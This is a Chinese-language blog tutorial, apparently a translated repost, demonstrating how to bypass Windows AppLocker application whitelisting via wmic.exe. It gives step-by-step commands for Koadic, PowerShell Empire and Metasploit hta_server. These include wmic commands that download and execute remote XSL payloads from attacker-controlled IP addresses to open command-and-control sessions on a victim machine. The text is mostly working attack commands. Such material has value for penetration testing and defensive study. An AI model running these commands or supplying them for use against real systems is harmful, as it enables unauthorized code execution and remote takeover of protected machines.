• 使用wmic.exe绕过应用程序白名单

    这篇文章的目的是演示将AppLocker旁路列入白名单的最常见和最熟悉的技术。众所周知,出于安全原因,系统管理员添加了组策略来限制本地用户执行应用程序。在上一篇文章中,我们讨论了“ Windows Applocker策略-入门指南 ”,因为它们定义了应用程序控制策略的AppLocker规则以及如何使用它们。但是今天,您将学习如何使用wmic.exe绕过Applocker策略。

    表中的内容

    Wmic.exe简介

    开发技术

    • Koadic
    • Powershell Empire
    • 在XSL代码中链接hta
    Wmic.exe

    WMIC实用程序是一种Microsoft工具,提供了WMI命令行界面,该界面用于本地和远程计算机的各种管理功能,还用于WMIC查询,例如系统设置,停止进程以及在本地或远程运行脚本。因此,它可以调用XSL脚本(可扩展样式表语言)。

    开发技术
    Koadic

    我们将在koadic的帮助下生成一个恶意XSL文件,koadic是一个与Metasploit和Powershell Empire非常相似的命令和控制工具。

    要了解koadic的工作原理,请从此处阅读我们的文章https : //www.hackingarticles.in/koadic-com-command-control-framework/

    安装完成后,您可以运行  ./koadic  文件来启动koadic,并通过运行以下命令并设置SRVHOST来启动staged / js / wmic stager,并设置stager应该将其作为主目录。

    use stager/js/wmic

    set SRVHOST 192.168.1.107

    run

    执行以下WMIC命令以从远程服务器下载并运行恶意XSL文件:

    wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

    一旦恶意XSL文件将在目标计算机上执行,您将拥有与Metasploit一样的Zombie连接。

    PowerShell Empire

    对于我们的wmic Attack的下一种方法,我们将使用Empire。Empire是一个开发后的框架。到目前为止,我们已经将xsl钉与Metasploit配对,但是在这种方法中,我们将使用empire框架。它仅仅是基于python的PowerShell Windows代理,因此非常有用。Empire是由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior开发的。您可以从此处下载此框架

    要获得《Empire》的基本指南,请访问我们介绍帝国的文章:

    https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

    empire框架启动后,键入listener来检查是否有任何活动的监听器。正如您在下图中所看到的,没有活动的侦听器。所以要设置一个监听器类型:

    listeners

    uselistner http

    set Host http://192.168.1.107

    execute

    使用以上命令,您将拥有一个活动的侦听器。键入回来以退出侦听器,以便您可以启动PowerShell。

    对于wmic攻击,我们将使用舞台游戏。empire中的登台者是一段代码,可让我们的恶意代码通过受感染主机上的代理运行。因此,对于这种类型:

    usestager windows/launcher_xsl

    set Listener http

    execute

    Usestager将创建一个恶意代码文件,该文件将保存在名为launcher.xsl的/ tmp中。

    我们已经使用python HTTP服务器在受害者的机器内传输此文件

    一旦文件运行,我们将在侦听器上得到结果。通过键入以下命令在受害者计算机上运行文件:

    wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

    要查看是否有任何会话打开,请键入“ agents”。这样做将为您显示会话名称。要访问该会话,请输入:

    interact Z639YHPA

    sysinfo

    在XSL代码中链接hta

    众所周知,wmic可以远程执行任何文件或脚本,因此我们将在XSL代码内链接一个hta文件。XSL文件将包含一个链接,该链接用于通过mshta.exe下载并执行恶意的hta文件,该文件由wmic正式触发。

    因此,让我们在Metasploit的帮助下生成一个hta文件:

    use exploit/windows/misc/hta_server

    msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109

    msf exploit(windows/misc/hta_server) > exploit

    现在,复制URL并将其放置在XSL代码中,因为它们具有执行Microsoft语言脚本的能力。

    然后,我们创建了一个“ payload.xsl”文件,您可以从此链接 获取帮助以编写XSL代码,然后放置hta文件的链接,如下所示。

    现在,我们再次需要通过wmic.exe在以下命令的帮助下执行XSL文件:

    wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"

    执行以上命令后,您将打开一个会话。要访问会话,请输入:

    sessions 1
  • 相关阅读:
    zip压缩类
    sqlserver配置允许快照隔离
    (三)装饰模式
    (二)策略模式
    (一)简单工厂模式
    MFC中lib和dll的区别
    VC MFC工具栏(CToolBar)控件(非常重要)
    CMFCMenuBar和CMFCToolBar相同ID,在显示不同标签文字
    CImageList类Create函数参数解析
    c++连接数据库代码
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13743808.html
Copyright © 2020-2023  润新知